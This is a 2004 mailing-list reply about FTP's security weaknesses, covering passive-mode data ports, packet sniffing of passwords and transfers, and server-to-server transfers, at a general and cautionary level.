ANN: FTP Commander (the ftp browser Frank asked for...)

Frank D. Engel, Jr. fde101 at fjrhome.net
Wed Sep 8 10:24:36 EDT 2004 

>  I never researched packet capture and those "security auditing"
>  tools... the thing that scares me most is the fact that when in 
> passive
>  mode, the server will start listening in a data port and accepts any
>  connection without checking if the data port client is the same one in
>  the control port, and it will send the file to that client, file theft
>  is just a matter of being there in the right time... very scary...

This can be a useful feature, though.  You can directly transfer files 
from one server to another by setting one to active and the other to 
passive mode, and taking the port number and IP address of one and 
feeding it to the other in order to have the data connection directly 
opened between them.  That way, the data is only sent across the 
network once, rather than being downloaded to your computer, then 
uploaded to the other server.  It can be even more significant if there 
is a faster network between the two servers than between the client and 
either of the servers.

However, for security purposes, the situation is even worse than you 
seem to think.  Not only could someone else on the network "sniff" the 
passwords...   they could sniff the port numbers and IP addresses of 
the connections too.

What's more, they wouldn't have to "hijack" the file by connecting to 
the port you establish.  Assume someone did -- you might guess that 
something was wrong, or at least know to check, because your client 
would fail trying to make the connection, and the server would report 
back through the control connection that the transfer was complete.

If they just sniff the data connection itself and record the packets, 
they could reconstruct the file as you receive it yourself, and you 
might not have a clue that it happened.


FTP is *very* insecure, and is really only any good for downloads of 
public files, or for transfers across "trusted" networks.


eMail protocols are plaintext too, btw...  often including plaintext 
passwords, or perhaps no passwords at all in some cases.   VERY scary.



___________________________________________________________
$0 Web Hosting with up to 120MB web space, 1000 MB Transfer
10 Personalized POP and Web E-mail Accounts, and much more.
Signup at www.doteasy.com

More information about the use-livecode mailing list